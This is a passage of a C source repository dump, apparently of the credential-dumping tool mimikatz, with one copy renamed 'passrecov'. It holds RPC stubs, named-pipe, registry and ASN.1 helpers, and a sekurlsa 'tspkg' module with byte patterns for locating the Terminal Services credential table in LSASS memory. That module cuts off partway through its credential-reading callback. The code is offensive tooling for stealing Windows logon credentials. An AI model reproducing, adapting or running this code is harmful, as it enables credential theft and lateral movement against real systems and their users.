0x08, 0x00, 0x06, 0x00, 0x13, 0x20, 0x10, 0x00, 0x0e, 0x00, 0x50, 0x21, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x10, 0x00, 0x00 33 | }}; 34 | #elif defined(_M_IX86) 35 | #pragma optimize("", off) 36 | error_status_t ServerAlive2(handle_t hRpc, COMVERSION *pComVersion, DUALSTRINGARRAY **ppdsaOrBindings, DWORD *pReserved) 37 | { 38 | return (error_status_t) NdrClientCall2((PMIDL_STUB_DESC) &IObjectExporter_StubDesc, (PFORMAT_STRING) &IObjectExporter__MIDL_ProcFormatString.Format[0], (unsigned char *) &hRpc).Simple; 39 | } 40 | #pragma optimize("", on) 41 | static const IObjectExporter_MIDL_PROC_FORMAT_STRING IObjectExporter__MIDL_ProcFormatString = {0, { 42 | 0x00, 0x48, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x14, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x00, 0x45, 0x04, 0x08, 0x03, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x21, 0x04, 0x00, 43 | 0x06, 0x00, 0x13, 0x20, 0x08, 0x00, 0x0e, 0x00, 0x50, 0x21, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x10, 0x00, 0x00, 44 | }}; 45 | #endif 46 | static const IObjectExporter_MIDL_TYPE_FORMAT_STRING IObjectExporter__MIDL_TypeFormatString = {0, { 47 | 0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x15, 0x01, 0x04, 0x00, 0x06, 0x06, 0x5c, 0x5b, 0x11, 0x14, 0x02, 0x00, 0x12, 0x00, 0x0e, 0x00, 0x1b, 0x01, 0x02, 0x00, 0x07, 0x00, 0xfc, 0xff, 0x01, 0x00, 48 | 0x06, 0x5b, 0x17, 0x01, 0x04, 0x00, 0xf0, 0xff, 0x06, 0x06, 0x5c, 0x5b, 0x11, 0x0c, 0x08, 0x5c, 0x00 49 | }}; -------------------------------------------------------------------------------- /modules/kull_m_pipe.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kull_m_pipe.h" 7 | 8 | BOOL kull_m_pipe_server(LPCWCHAR pipeName, HANDLE *phPipe) 9 | { 10 | BOOL status = FALSE; 11 | *phPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT, 1, 0, 0, NMPWAIT_USE_DEFAULT_WAIT, NULL); 12 | if(!(status = (*phPipe && (*phPipe != INVALID_HANDLE_VALUE)))) 13 | PRINT_ERROR_AUTO(L"CreateNamedPipe"); 14 | return status; 15 | } 16 | 17 | BOOL kull_m_pipe_server_connect(HANDLE hPipe) 18 | { 19 | BOOL status = FALSE; 20 | if(!(status = (ConnectNamedPipe(hPipe, NULL) || (GetLastError() == ERROR_PIPE_CONNECTED)))) 21 | PRINT_ERROR_AUTO(L"ConnectNamedPipe"); 22 | return status; 23 | } 24 | 25 | BOOL kull_m_pipe_client(LPCWCHAR pipeName, PHANDLE phPipe) 26 | { 27 | BOOL status = FALSE; 28 | DWORD dwMode = PIPE_READMODE_MESSAGE | PIPE_WAIT; 29 | if(WaitNamedPipe(pipeName, NMPWAIT_USE_DEFAULT_WAIT)) 30 | { 31 | *phPipe = CreateFile(pipeName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); 32 | if(*phPipe && (*phPipe != INVALID_HANDLE_VALUE)) 33 | { 34 | if(!(status = SetNamedPipeHandleState(*phPipe, &dwMode, NULL, NULL))) 35 | PRINT_ERROR_AUTO(L"SetNamedPipeHandleState"); 36 | } 37 | else PRINT_ERROR_AUTO(L"CreateFile"); 38 | } 39 | else PRINT_ERROR_AUTO(L"WaitNamedPipe"); 40 | return status; 41 | } 42 | 43 | BOOL kull_m_pipe_read(HANDLE hPipe, LPBYTE *buffer, DWORD *size) 44 | { 45 | BOOL status = FALSE; 46 | DWORD szReaded, szBuffer = 0; 47 | BYTE * tmpBuffer = NULL; DWORD szTmpBuffer = 0; 48 | 49 | *size = 0; 50 | *buffer = NULL; 51 | do 52 | { 53 | if(*buffer) 54 | { 55 | tmpBuffer = *buffer; 56 | szTmpBuffer = szBuffer; 57 | } 58 | 59 | szBuffer += 2048; 60 | if(*buffer = (BYTE *) LocalAlloc(LPTR, szBuffer)) 61 | { 62 | if(tmpBuffer) 63 | { 64 | RtlCopyMemory(*buffer, tmpBuffer, szTmpBuffer); 65 | tmpBuffer = (BYTE *) LocalFree(tmpBuffer); 66 | } 67 | 68 | if(status = ReadFile(hPipe, *buffer + szTmpBuffer, 2048, &szReaded, NULL)) 69 | { 70 | *size = szTmpBuffer + szReaded; 71 | break; 72 | } 73 | } 74 | } while(GetLastError() == ERROR_MORE_DATA); 75 | 76 | if(!status) 77 | { 78 | PRINT_ERROR_AUTO(L"ReadFile"); 79 | *buffer = (BYTE *) LocalFree(*buffer); 80 | *size = 0; 81 | } 82 | return status; 83 | } 84 | 85 | BOOL kull_m_pipe_write(HANDLE hPipe, LPCVOID buffer, DWORD size) 86 | { 87 | BOOL status = FALSE; 88 | DWORD nbWritten; 89 | if(WriteFile(hPipe, buffer, size, &nbWritten, NULL) && (size == nbWritten)) 90 | { 91 | if(!(status = FlushFileBuffers(hPipe))) 92 | PRINT_ERROR_AUTO(L"FlushFileBuffers"); 93 | } 94 | else PRINT_ERROR_AUTO(L"WriteFile"); 95 | return status; 96 | } 97 | 98 | BOOL kull_m_pipe_close(PHANDLE phPipe) 99 | { 100 | BOOL status = FALSE; 101 | DWORD flags = 0; 102 | if(*phPipe && (*phPipe != INVALID_HANDLE_VALUE)) 103 | { 104 | if(GetNamedPipeInfo(*phPipe, &flags, NULL, NULL, NULL) || (GetLastError() == ERROR_PIPE_NOT_CONNECTED)) 105 | { 106 | if(flags & PIPE_SERVER_END) 107 | { 108 | if(!DisconnectNamedPipe(*phPipe)) 109 | PRINT_ERROR_AUTO(L"DisconnectNamedPipe"); 110 | } 111 | if(status = CloseHandle(*phPipe)) 112 | *phPipe = INVALID_HANDLE_VALUE; 113 | else PRINT_ERROR_AUTO(L"CloseHandle"); 114 | } 115 | else PRINT_ERROR_AUTO(L"GetNamedPipeInfo"); 116 | } 117 | return status; 118 | } -------------------------------------------------------------------------------- /modules/kull_m_registry.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "kull_m_registry_structures.h" 8 | #include "kull_m_string.h" 9 | 10 | const wchar_t *KULL_M_REGISTRY_TYPE_WSTRING[]; 11 | 12 | typedef enum _KULL_M_REGISTRY_TYPE 13 | { 14 | KULL_M_REGISTRY_TYPE_OWN, 15 | KULL_M_REGISTRY_TYPE_HIVE, 16 | } KULL_M_REGISTRY_TYPE; 17 | 18 | typedef struct _KULL_M_REGISTRY_HIVE_HANDLE 19 | { 20 | HANDLE hFileMapping; 21 | LPVOID pMapViewOfFile; 22 | PBYTE pStartOf; 23 | PKULL_M_REGISTRY_HIVE_KEY_NAMED pRootNamedKey; 24 | } KULL_M_REGISTRY_HIVE_HANDLE, *PKULL_M_REGISTRY_HIVE_HANDLE; 25 | 26 | typedef struct _KULL_M_REGISTRY_HANDLE { 27 | KULL_M_REGISTRY_TYPE type; 28 | union { 29 | PKULL_M_REGISTRY_HIVE_HANDLE pHandleHive; 30 | }; 31 | } KULL_M_REGISTRY_HANDLE, *PKULL_M_REGISTRY_HANDLE; 32 | 33 | BOOL kull_m_registry_open(IN KULL_M_REGISTRY_TYPE Type, IN HANDLE hAny, BOOL isWrite, OUT PKULL_M_REGISTRY_HANDLE *hRegistry); 34 | PKULL_M_REGISTRY_HANDLE kull_m_registry_close(IN PKULL_M_REGISTRY_HANDLE hRegistry); 35 | 36 | BOOL kull_m_registry_RegOpenKeyEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpSubKey, IN DWORD ulOptions, IN REGSAM samDesired, OUT PHKEY phkResult); 37 | BOOL kull_m_registry_RegCloseKey(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey); 38 | BOOL kull_m_registry_RegQueryValueEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpValueName, IN LPDWORD lpReserved, OUT OPTIONAL LPDWORD lpType, OUT OPTIONAL LPBYTE lpData, IN OUT OPTIONAL LPDWORD lpcbData); 39 | BOOL kull_m_registry_RegSetValueEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpValueName, IN DWORD Reserved, IN DWORD dwType, IN OPTIONAL LPCBYTE lpData, IN DWORD cbData); 40 | BOOL kull_m_registry_RegQueryInfoKey(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, OUT OPTIONAL LPWSTR lpClass, IN OUT OPTIONAL LPDWORD lpcClass, IN OPTIONAL LPDWORD lpReserved, OUT OPTIONAL LPDWORD lpcSubKeys, OUT OPTIONAL LPDWORD lpcMaxSubKeyLen, OUT OPTIONAL LPDWORD lpcMaxClassLen, OUT OPTIONAL LPDWORD lpcValues, OUT OPTIONAL LPDWORD lpcMaxValueNameLen, OUT OPTIONAL LPDWORD lpcMaxValueLen, OUT OPTIONAL LPDWORD lpcbSecurityDescriptor, OUT OPTIONAL PFILETIME lpftLastWriteTime); 41 | 42 | BOOL kull_m_registry_RegEnumKeyEx(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN DWORD dwIndex, OUT LPWSTR lpName, IN OUT LPDWORD lpcName, IN LPDWORD lpReserved, OUT OPTIONAL LPWSTR lpClass, IN OUT OPTIONAL LPDWORD lpcClass, OUT OPTIONAL PFILETIME lpftLastWriteTime); 43 | BOOL kull_m_registry_RegEnumValue(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN DWORD dwIndex, OUT LPWSTR lpValueName, IN OUT LPDWORD lpcchValueName, IN LPDWORD lpReserved, OUT OPTIONAL LPDWORD lpType, OUT OPTIONAL LPBYTE lpData, OUT OPTIONAL LPDWORD lpcbData); 44 | 45 | BOOL kull_m_registry_OpenAndQueryWithAlloc(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpSubKey, IN OPTIONAL LPCWSTR lpValueName, OUT OPTIONAL LPDWORD lpType, OUT OPTIONAL LPVOID *lpData, IN OUT OPTIONAL LPDWORD lpcbData); 46 | BOOL kull_m_registry_QueryWithAlloc(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpValueName, OUT OPTIONAL LPDWORD lpType, OUT OPTIONAL LPVOID *lpData, IN OUT OPTIONAL LPDWORD lpcbData); 47 | 48 | PKULL_M_REGISTRY_HIVE_KEY_NAMED kull_m_registry_searchKeyNamedInList(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN PKULL_M_REGISTRY_HIVE_BIN_CELL pHbC, IN LPCWSTR lpSubKey); 49 | PKULL_M_REGISTRY_HIVE_VALUE_KEY kull_m_registry_searchValueNameInList(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hKey, IN OPTIONAL LPCWSTR lpValueName); -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_ms-claims.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "kull_m_rpc.h" 3 | 4 | typedef wchar_t *CLAIM_ID; 5 | typedef wchar_t **PCLAIM_ID; 6 | 7 | typedef enum _CLAIM_TYPE { 8 | CLAIM_TYPE_INT64 = 1, 9 | CLAIM_TYPE_UINT64 = 2, 10 | CLAIM_TYPE_STRING = 3, 11 | CLAIM_TYPE_BOOLEAN = 6 12 | } CLAIM_TYPE, *PCLAIM_TYPE; 13 | 14 | typedef enum _CLAIMS_SOURCE_TYPE { 15 | CLAIMS_SOURCE_TYPE_AD = 1, 16 | CLAIMS_SOURCE_TYPE_CERTIFICATE = ( CLAIMS_SOURCE_TYPE_AD + 1 ) 17 | } CLAIMS_SOURCE_TYPE; 18 | 19 | typedef enum _CLAIMS_COMPRESSION_FORMAT { 20 | CLAIMS_COMPRESSION_FORMAT_NONE = 0, 21 | CLAIMS_COMPRESSION_FORMAT_LZNT1 = 2, 22 | CLAIMS_COMPRESSION_FORMAT_XPRESS = 3, 23 | CLAIMS_COMPRESSION_FORMAT_XPRESS_HUFF = 4 24 | } CLAIMS_COMPRESSION_FORMAT; 25 | 26 | typedef struct _CLAIM_ENTRY { 27 | CLAIM_ID Id; 28 | CLAIM_TYPE Type; 29 | union 30 | { 31 | struct _ci64 32 | { 33 | ULONG ValueCount; 34 | LONG64 *Int64Values; 35 | } ci64; 36 | struct _cui64 37 | { 38 | ULONG ValueCount; 39 | ULONG64 *Uint64Values; 40 | } cui64; 41 | struct _cs 42 | { 43 | ULONG ValueCount; 44 | LPWSTR *StringValues; 45 | } cs; 46 | struct _cb 47 | { 48 | ULONG ValueCount; 49 | ULONG64 *BooleanValues; 50 | } cb; 51 | } Values; 52 | } CLAIM_ENTRY, *PCLAIM_ENTRY; 53 | 54 | typedef struct _CLAIMS_ARRAY { 55 | CLAIMS_SOURCE_TYPE usClaimsSourceType; 56 | ULONG ulClaimsCount; 57 | PCLAIM_ENTRY ClaimEntries; 58 | } CLAIMS_ARRAY, *PCLAIMS_ARRAY; 59 | 60 | typedef struct _CLAIMS_SET { 61 | ULONG ulClaimsArrayCount; 62 | PCLAIMS_ARRAY ClaimsArrays; 63 | USHORT usReservedType; 64 | ULONG ulReservedFieldSize; 65 | BYTE *ReservedField; 66 | } CLAIMS_SET, *PCLAIMS_SET; 67 | 68 | typedef struct _CLAIMS_SET_METADATA { 69 | ULONG ulClaimsSetSize; 70 | BYTE *ClaimsSet; 71 | CLAIMS_COMPRESSION_FORMAT usCompressionFormat; 72 | ULONG ulUncompressedClaimsSetSize; 73 | USHORT usReservedType; 74 | ULONG ulReservedFieldSize; 75 | BYTE *ReservedField; 76 | } CLAIMS_SET_METADATA, *PCLAIMS_SET_METADATA; 77 | 78 | size_t PCLAIMS_SET_METADATA_AlignSize(handle_t _MidlEsHandle, PCLAIMS_SET_METADATA * _pType); 79 | void PCLAIMS_SET_METADATA_Encode(handle_t _MidlEsHandle, PCLAIMS_SET_METADATA * _pType); 80 | void PCLAIMS_SET_METADATA_Decode(handle_t _MidlEsHandle, PCLAIMS_SET_METADATA * _pType); 81 | void PCLAIMS_SET_METADATA_Free(handle_t _MidlEsHandle, PCLAIMS_SET_METADATA * _pType); 82 | 83 | size_t PCLAIMS_SET_AlignSize(handle_t _MidlEsHandle, PCLAIMS_SET * _pType); 84 | void PCLAIMS_SET_Encode(handle_t _MidlEsHandle, PCLAIMS_SET * _pType); 85 | void PCLAIMS_SET_Decode(handle_t _MidlEsHandle, PCLAIMS_SET * _pType); 86 | void PCLAIMS_SET_Free(handle_t _MidlEsHandle, PCLAIMS_SET * _pType); 87 | 88 | #define kull_m_rpc_DecodeClaimsSetMetaData(data, size, pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) PCLAIMS_SET_METADATA_Decode) 89 | #define kull_m_rpc_FreeClaimsSetMetaData(pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) PCLAIMS_SET_METADATA_Free) 90 | #define kull_m_rpc_EncodeClaimsSetMetaData(pObject, data, size) kull_m_rpc_Generic_Encode(pObject, data, size, (PGENERIC_RPC_ENCODE) PCLAIMS_SET_METADATA_Encode, (PGENERIC_RPC_ALIGNSIZE) PCLAIMS_SET_METADATA_AlignSize) 91 | 92 | #define kull_m_rpc_DecodeClaimsSet(data, size, pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) PCLAIMS_SET_Decode) 93 | #define kull_m_rpc_FreeClaimsSet(pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) PCLAIMS_SET_Free) 94 | #define kull_m_rpc_EncodeClaimsSet(pObject, data, size) kull_m_rpc_Generic_Encode(pObject, data, size, (PGENERIC_RPC_ENCODE) PCLAIMS_SET_Encode, (PGENERIC_RPC_ALIGNSIZE) PCLAIMS_SET_AlignSize) -------------------------------------------------------------------------------- /plog/modules/kuhl_m_standard.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kuhl_m_standard.h" 7 | 8 | const KUHL_M_C kuhl_m_c_standard[] = { 9 | {kuhl_m_standard_exit, L"exit", L"Quit passrecov"}, 10 | {kuhl_m_standard_cls, L"cls", L"Clear screen (doesn\'t work with redirections, like PsExec)"}, 11 | {kuhl_m_standard_log, L"log", L"Log passrecov input/output to file"}, 12 | {kuhl_m_standard_cd, L"cd", L"Change or display current directory"}, 13 | {kuhl_m_standard_localtime, L"localtime", L"Displays system local date and time (OJ command)"}, 14 | {kuhl_m_standard_hostname, L"hostname", L"Displays system local hostname"}, 15 | }; 16 | const KUHL_M kuhl_m_standard = { 17 | L"standard", L"Standard module", L"Basic commands (does not require module name)", 18 | ARRAYSIZE(kuhl_m_c_standard), kuhl_m_c_standard, NULL, NULL 19 | }; 20 | 21 | NTSTATUS kuhl_m_standard_exit(int argc, wchar_t * argv[]) 22 | { 23 | return argc ? STATUS_THREAD_IS_TERMINATING : STATUS_PROCESS_IS_TERMINATING; 24 | } 25 | 26 | NTSTATUS kuhl_m_standard_cls(int argc, wchar_t * argv[]) 27 | { 28 | HANDLE hStdOut = GetStdHandle(STD_OUTPUT_HANDLE); 29 | COORD coord = {0, 0}; 30 | DWORD count; 31 | CONSOLE_SCREEN_BUFFER_INFO csbi; 32 | 33 | GetConsoleScreenBufferInfo(hStdOut, &csbi); 34 | FillConsoleOutputCharacter(hStdOut, L' ', csbi.dwSize.X * csbi.dwSize.Y, coord, &count); 35 | SetConsoleCursorPosition(hStdOut, coord); 36 | return STATUS_SUCCESS; 37 | } 38 | 39 | NTSTATUS kuhl_m_standard_log(int argc, wchar_t * argv[]) 40 | { 41 | PCWCHAR filename = (kull_m_string_args_byName(argc, argv, L"stop", NULL, NULL) ? NULL : (argc ? argv[0] : MIMIKATZ_DEFAULT_LOG)); 42 | kprintf(L"Using \'%s\' for logfile : %s\n", filename, kull_m_output_file(filename) ? L"OK" : L"KO"); 43 | return STATUS_SUCCESS; 44 | } 45 | 46 | NTSTATUS kuhl_m_standard_cd(int argc, wchar_t * argv[]) 47 | { 48 | wchar_t * buffer; 49 | if(kull_m_file_getCurrentDirectory(&buffer)) 50 | { 51 | if(argc) 52 | kprintf(L"Cur: "); 53 | kprintf(L"%s\n", buffer); 54 | LocalFree(buffer); 55 | } 56 | else PRINT_ERROR_AUTO(L"kull_m_file_getCurrentDirectory"); 57 | 58 | if(argc) 59 | { 60 | if(SetCurrentDirectory(argv[0])) 61 | { 62 | if(kull_m_file_getCurrentDirectory(&buffer)) 63 | { 64 | kprintf(L"New: %s\n", buffer); 65 | LocalFree(buffer); 66 | } 67 | else PRINT_ERROR_AUTO(L"kull_m_file_getCurrentDirectory"); 68 | } 69 | else PRINT_ERROR_AUTO(L"SetCurrentDirectory"); 70 | } 71 | return STATUS_SUCCESS; 72 | } 73 | 74 | NTSTATUS kuhl_m_standard_localtime(int argc, wchar_t * argv[]) 75 | { 76 | FILETIME ft; 77 | TIME_ZONE_INFORMATION tzi; 78 | DWORD dwTzi; 79 | GetSystemTimeAsFileTime(&ft); 80 | dwTzi = GetTimeZoneInformation(&tzi); 81 | kprintf(L"Local: "); kull_m_string_displayLocalFileTime(&ft); kprintf(L"\n"); 82 | if(dwTzi != TIME_ZONE_ID_INVALID && dwTzi != TIME_ZONE_ID_UNKNOWN) 83 | kprintf(L"Zone : %.32s\n", (dwTzi == TIME_ZONE_ID_STANDARD) ? tzi.StandardName : tzi.DaylightName); 84 | kprintf(L"UTC : "); kull_m_string_displayFileTime(&ft); kprintf(L"\n"); 85 | return STATUS_SUCCESS; 86 | } 87 | 88 | NTSTATUS kuhl_m_standard_hostname(int argc, wchar_t * argv[]) 89 | { 90 | wchar_t *buffer; 91 | if(kull_m_net_getComputerName(TRUE, &buffer)) 92 | { 93 | kprintf(L"%s", buffer); 94 | LocalFree(buffer); 95 | } 96 | if(kull_m_net_getComputerName(FALSE, &buffer)) 97 | { 98 | kprintf(L" (%s)", buffer); 99 | LocalFree(buffer); 100 | } 101 | kprintf(L"\n"); 102 | return STATUS_SUCCESS; 103 | } -------------------------------------------------------------------------------- /modules/kull_m_asn1.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kull_m_asn1.h" 7 | 8 | ASN1module_t hASN1Module = NULL; 9 | ASN1encoding_t ASN1enc = NULL; 10 | ASN1decoding_t ASN1dec = NULL; 11 | 12 | void kull_m_asn1_BitStringFromULONG(BerElement * pBer, ULONG data) 13 | { 14 | BYTE flagBuffer[5] = {0}; 15 | *(PDWORD) (flagBuffer + 1) = _byteswap_ulong(data); 16 | ber_printf(pBer, "X", flagBuffer, sizeof(flagBuffer)); 17 | } 18 | 19 | void kull_m_asn1_GenTime(BerElement * pBer, PFILETIME localtime) 20 | { 21 | SYSTEMTIME st; 22 | char buffer[4 + 2 + 2 + 2 + 2 + 2 + 1 + 1]; 23 | if(FileTimeToSystemTime(localtime, &st)) 24 | if(sprintf_s(buffer, sizeof(buffer), "%04hu%02hu%02hu%02hu%02hu%02huZ", st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond) > 0) 25 | ber_printf(pBer, "to", DIRTY_ASN1_ID_GENERALIZED_TIME, buffer, sizeof(buffer) - 1); 26 | } 27 | 28 | void kull_m_asn1_GenString(BerElement * pBer, PCUNICODE_STRING String) 29 | { 30 | ANSI_STRING aString; 31 | if(NT_SUCCESS(RtlUnicodeStringToAnsiString(&aString, String, TRUE))) 32 | { 33 | ber_printf(pBer, "to", DIRTY_ASN1_ID_GENERAL_STRING, aString.Buffer, aString.Length); 34 | RtlFreeAnsiString(&aString); 35 | } 36 | } 37 | 38 | static const ASN1GenericFun_t kull_m_asn1_encdecfreefntab[] = {NULL}; 39 | static const ASN1uint32_t kull_m_asn1_sizetab[] = {0}; 40 | BOOL kull_m_asn1_init() 41 | { 42 | BOOL status = FALSE; 43 | int ret; 44 | if(hASN1Module = ASN1_CreateModule(ASN1_THIS_VERSION, ASN1_BER_RULE_DER, ASN1FLAGS_NOASSERT, 1, kull_m_asn1_encdecfreefntab, kull_m_asn1_encdecfreefntab, (const ASN1FreeFun_t *) kull_m_asn1_encdecfreefntab, kull_m_asn1_sizetab, 'iwik')) 45 | { 46 | ret = ASN1_CreateEncoder(hASN1Module, &ASN1enc, NULL, 0, NULL); 47 | if(ASN1_FAILED(ret)) 48 | { 49 | PRINT_ERROR(L"ASN1_CreateEncoder: %i\n", ret); 50 | ASN1enc = NULL; 51 | } 52 | else 53 | { 54 | ret = ASN1_CreateDecoder(hASN1Module, &ASN1dec, NULL, 0, NULL); 55 | if(ASN1_FAILED(ret)) 56 | { 57 | PRINT_ERROR(L"ASN1_CreateDecoder: %i\n", ret); 58 | ASN1dec = NULL; 59 | } 60 | } 61 | } 62 | else PRINT_ERROR(L"ASN1_CreateModule\n"); 63 | 64 | status = hASN1Module && ASN1enc && ASN1dec; 65 | if(!status) 66 | kull_m_asn1_term(); 67 | return status; 68 | } 69 | 70 | void kull_m_asn1_term() 71 | { 72 | if(ASN1dec) 73 | { 74 | ASN1_CloseDecoder(ASN1dec); 75 | ASN1dec = NULL; 76 | } 77 | if(ASN1enc) 78 | { 79 | ASN1_CloseEncoder(ASN1enc); 80 | ASN1enc = NULL; 81 | } 82 | if(hASN1Module) 83 | { 84 | ASN1_CloseModule(hASN1Module); 85 | hASN1Module = NULL; 86 | } 87 | } 88 | 89 | BOOL kull_m_asn1_DotVal2Eoid(__in const ASN1char_t *dotOID, __out OssEncodedOID *encodedOID) 90 | { 91 | BOOL status = FALSE; 92 | if(ASN1enc && dotOID && encodedOID) 93 | { 94 | encodedOID->length = 0; 95 | encodedOID->value = NULL; 96 | status = ASN1BERDotVal2Eoid(ASN1enc, dotOID, encodedOID); 97 | } 98 | return status; 99 | } 100 | 101 | void kull_m_asn1_freeEnc(void *pBuf) 102 | { 103 | if(ASN1enc && pBuf) 104 | ASN1_FreeEncoded(ASN1enc, pBuf); 105 | } 106 | 107 | BOOL kull_m_asn1_Eoid2DotVal(__in const OssEncodedOID *encodedOID, __out ASN1char_t **dotOID) 108 | { 109 | BOOL status = FALSE; 110 | if(ASN1dec && encodedOID && dotOID) 111 | { 112 | *dotOID = NULL; 113 | status = ASN1BEREoid2DotVal(ASN1dec, encodedOID, dotOID); 114 | } 115 | return status; 116 | } 117 | 118 | void kull_m_asn1_freeDec(void *pBuf) 119 | { 120 | if(pBuf) 121 | ASN1Free(pBuf); 122 | } -------------------------------------------------------------------------------- /plog/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kuhl_m_sekurlsa_tspkg.h" 7 | #if defined(_M_ARM64) 8 | BYTE PTRN_WALL_TSGlobalCredTable[] = {0xe1, 0x43, 0x00, 0x91, 0x20, 0x01, 0x3f, 0xd6, 0xf3, 0x03, 0x00, 0xaa}; 9 | KULL_M_PATCH_GENERIC TsPkgReferences[] = { 10 | {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WALL_TSGlobalCredTable), PTRN_WALL_TSGlobalCredTable}, {0, NULL}, {-20, 8, 1}}, 11 | }; 12 | #elif defined(_M_X64) 13 | BYTE PTRN_WALL_TSGlobalCredTable[] = {0x48, 0x83, 0xec, 0x20, 0x48, 0x8d, 0x0d}; 14 | KULL_M_PATCH_GENERIC TsPkgReferences[] = { 15 | {KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WALL_TSGlobalCredTable), PTRN_WALL_TSGlobalCredTable}, {0, NULL}, {7, 0}}, 16 | {KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WALL_TSGlobalCredTable), PTRN_WALL_TSGlobalCredTable}, {0, NULL}, {7, 1}}, 17 | }; 18 | #elif defined(_M_IX86) 19 | BYTE PTRN_WNO8_TSGlobalCredTable[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x51, 0x56, 0xbe}; 20 | BYTE PTRN_WIN8_TSGlobalCredTable[] = {0x8b, 0xff, 0x53, 0xbb}; 21 | BYTE PTRN_WN81_TSGlobalCredTable[] = {0x8b, 0xff, 0x57, 0xbf}; 22 | KULL_M_PATCH_GENERIC TsPkgReferences[] = { 23 | {KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WNO8_TSGlobalCredTable), PTRN_WNO8_TSGlobalCredTable}, {0, NULL}, {8, 0}}, 24 | {KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_TSGlobalCredTable), PTRN_WIN8_TSGlobalCredTable}, {0, NULL}, {4, 0}}, 25 | {KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN81_TSGlobalCredTable), PTRN_WN81_TSGlobalCredTable}, {0, NULL}, {4, 0}}, 26 | {KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN81_TSGlobalCredTable), PTRN_WN81_TSGlobalCredTable}, {0, NULL}, {4, 1}}, 27 | }; 28 | #endif 29 | 30 | PRTL_AVL_TABLE TSGlobalCredTable = NULL; 31 | LONG TsOffsetIndex = 0; 32 | 33 | KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}}; 34 | const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_single_package[] = {&kuhl_m_sekurlsa_tspkg_package}; 35 | 36 | NTSTATUS kuhl_m_sekurlsa_tspkg(int argc, wchar_t * argv[]) 37 | { 38 | return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_tspkg_single_package, 1); 39 | } 40 | 41 | const KIWI_TS_CREDENTIAL_HELPER tsCredentialHelper[] = { 42 | {FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_TS_CREDENTIAL, pTsPrimary)}, 43 | {FIELD_OFFSET(KIWI_TS_CREDENTIAL_1607, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_TS_CREDENTIAL_1607, pTsPrimary)} 44 | }; 45 | 46 | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) 47 | { 48 | KIWI_TS_PRIMARY_CREDENTIAL primaryCredential; 49 | PVOID buffer = NULL; 50 | KULL_M_MEMORY_ADDRESS aLocalMemory = {&buffer, 